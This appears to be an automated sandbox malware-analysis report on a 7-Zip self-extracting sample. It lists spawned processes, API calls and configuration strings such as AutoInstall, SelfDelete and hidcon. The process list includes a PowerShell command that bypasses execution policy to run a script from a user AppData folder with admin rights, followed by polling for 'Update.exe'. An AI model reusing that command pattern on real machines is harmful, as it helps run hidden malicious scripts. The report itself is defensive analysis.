Start time:	08:48:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase:	0x130000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:49:18
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq Update.exe"
Imagebase:	0x10000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:49:18
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "Update.exe"
Imagebase:	0x7a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:49:18
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0x5f0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:49:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq Update.exe"
Imagebase:	0x10000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:49:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "Update.exe"
Imagebase:	0x7a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:49:48
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0x5f0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:50:18
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist /FI "IMAGENAME eq Update.exe"
Imagebase:	0x10000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:50:18
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "Update.exe"
Imagebase:	0x7a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:50:18
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 30 /nobreak
Imagebase:	0x5f0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.8%
Total number of Nodes:	1423
Total number of Limit Nodes:	15

Executed Functions

Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C

Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD

_wtol.MSVCRT ref: 0040509F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
_wtol.MSVCRT ref: 00405217
??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F

Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC

Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519

Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569

Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6

wsprintfW.USER32 ref: 00405595
_wtol.MSVCRT ref: 004057DE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
CoInitialize.OLE32(00000000), ref: 004059E9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
GetKeyState.USER32(00000010), ref: 00405AA1
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
memset.MSVCRT ref: 004060AE
ShellExecuteExW.SHELL32(?), ref: 0040617E
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
_wtol.MSVCRT ref: 00405F65
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C

Strings

4DA, xrefs: 00406034
7-Zip SFX, xrefs: 00406490
sfxconfig, xrefs: 0040527C, 00405488
Delete, xrefs: 00406352
;!@Install@!UTF-8!, xrefs: 00405436
MiscFlags, xrefs: 0040573F
7zSfxString%d, xrefs: 0040558F
ExecuteFile, xrefs: 00405A61, 00405B47, 00405B55
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406495
7ZipSfx.%03x, xrefs: 00405C77
RunProgram, xrefs: 00405A66, 00405B6B, 00405B79
x86, xrefs: 00405FBE
InstallPath, xrefs: 004059F3
SetEnvironment, xrefs: 0040586E, 0040591F
XpA, xrefs: 00405581
SelfDelete, xrefs: 0040577C, 0040640B
GUIFlags, xrefs: 0040571F
amd64, xrefs: 00405FE4
ExecuteParameters, xrefs: 0040605D
@DA, xrefs: 00405699
hidcon, xrefs: 00405E5E
setup.exe, xrefs: 00405DE5, 00405DEA, 00405E45
del, xrefs: 00405F9A
forcenowait, xrefs: 00405F25
AutoInstall, xrefs: 00405AC1, 00405B1C, 00405ECC
sfxversion, xrefs: 004050D6
4AA, xrefs: 0040504C
nowait, xrefs: 00405F03
HelpText, xrefs: 0040595E
;!@InstallEnd@!, xrefs: 00405431
IA, xrefs: 004055D2, 004058FB
Shortcut, xrefs: 0040632A
BeginPrompt, xrefs: 00405A71
shc, xrefs: 00405F7A
GUIMode, xrefs: 004056FF
i386, xrefs: 00405FD1
FinishMessage, xrefs: 00406399
x64, xrefs: 00405FF7
OverwriteMode, xrefs: 004056BB

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
API String ID: 154539431-3058303289
Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
SetLastError.KERNEL32(00000010), ref: 0040303D

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E

Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
SendMessageW.USER32(00008001,00000000,?), ref: 004011FF

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00411E1C
__p__fmode.MSVCRT ref: 00411E31
__p__commode.MSVCRT ref: 00411E3F
__setusermatherr.MSVCRT ref: 00411E6B
_initterm.MSVCRT ref: 00411E81
__getmainargs.MSVCRT ref: 00411EA4
_initterm.MSVCRT ref: 00411EB4
GetStartupInfoA.KERNEL32(?), ref: 00411EF3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00411F17
exit.KERNELBASE ref: 00411F27
_XcptFilter.MSVCRT ref: 00411F39

Strings

HpA, xrefs: 00411E9C, 00411E9F

Memory Dump Source

Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
